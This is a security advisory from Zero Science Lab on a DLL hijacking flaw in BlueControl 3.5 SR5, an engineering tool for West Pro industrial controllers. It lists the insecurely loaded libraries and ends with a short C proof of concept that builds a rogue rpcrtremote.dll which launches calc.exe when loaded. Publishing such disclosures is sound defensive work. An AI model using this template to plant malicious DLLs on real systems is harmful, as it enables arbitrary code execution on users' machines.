BlueControl 3.5 SR5 Insecure Library Loading Arbitrary Code Execution

2016-01-19T00:00:00
ID ZSL-2016-5296
Type zeroscience
Reporter Gjoko Krstic
Modified 2016-01-19T00:00:00

Description

Title: BlueControl 3.5 SR5 Insecure Library Loading Arbitrary Code Execution
Advisory ID: ZSL-2016-5296
Type: Local/Remote
Impact: System Access
Risk: (4/5)
Release Date: 19.01.2016

Summary

Engineering Tool for West Pro Series of controllers (KS20-1, KS92-1, TB40-1, KS800, KS816, Dig280-1, KS vario, CI45, KS45, SG45, TB45, RL400, Pro96, CAL4600).

Description

BlueControl suffers from a DLL Hijacking issue. The vulnerability is caused due to the application loading libraries (sortserver2003compat.dll, sxs.dll, cryptsp.dll, rpcrtremote.dll) in an insecure manner. This can be exploited to load arbitrary libraries by tricking a user into opening a related application files (.BCD, .BCL, .BCT, .EDW, .E80) located on a remote WebDAV or SMB share.

Vendor

West Control Solutions - <http://www.west-cs.com>

Affected Version

3.5.SR5

Tested On

Microsoft Windows 7 Ultimate SP1 (EN)
Microsoft Windows 7 Professional SP1 (EN)

Vendor Status

N/A

PoC

bluecontrol_dllhijack.c

Credits

Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk>

References

[1] <https://exchange.xforce.ibmcloud.com/vulnerabilities/109710>
[2] <https://cxsecurity.com/issue/WLB-2016010116>
[3] <https://packetstormsecurity.com/files/135316>
[4] <https://secunia.com/advisories/68412/>

Changelog

[19.01.2016] - Initial release
[21.01.2016] - Added reference [1], [2] and [3]
[05.02.2016] - Added reference [4]

Contact

Zero Science Lab

Web: <http://www.zeroscience.mk>
e-mail: lab@zeroscience.mk

                                        
                                            /*


BlueControl 3.5 SR5 Insecure Library Loading Arbitrary Code Execution


Vendor: West Control Solutions
        PMA Prozeß- und Maschinen-Automation GmbH
Product web page: http://www.west-cs.com
Software link: http://www.west-cs.com/resources/software-temp-control/pma-products-software/
Application Path: C:\Program Files (x86)\PMA Tools\BlueControl\BlueControl.exe
Affected version: 3.5.SR5

Summary: Engineering Tool for West Pro Series of controllers (KS20-1, KS92-1,
TB40-1, KS800, KS816, Dig280-1, KS vario, CI45, KS45, SG45, TB45, RL400, Pro96,
CAL4600).

Desc: BlueControl suffers from a DLL Hijacking issue. The vulnerability is
caused due to the application loading libraries (sortserver2003compat.dll,
sxs.dll, cryptsp.dll, rpcrtremote.dll) in an insecure manner. This can be
exploited to load arbitrary libraries by tricking a user into opening a
related application files (.BCD, .BCL, .BCT, .EDW, .E80) located on a remote
WebDAV or SMB share.

Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Microsoft Windows 7 Professional SP1 (EN)


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2016-5296
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5296.php


10.12.2015

*/


// gcc -shared -o rpcrtremote.dll exploit.c

#include &lt;windows.h&gt; 

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpvReserved)
{
	exec();
	return 0;
}

int exec()
{
	WinExec("calc.exe" , SW_NORMAL);
	return 0;
}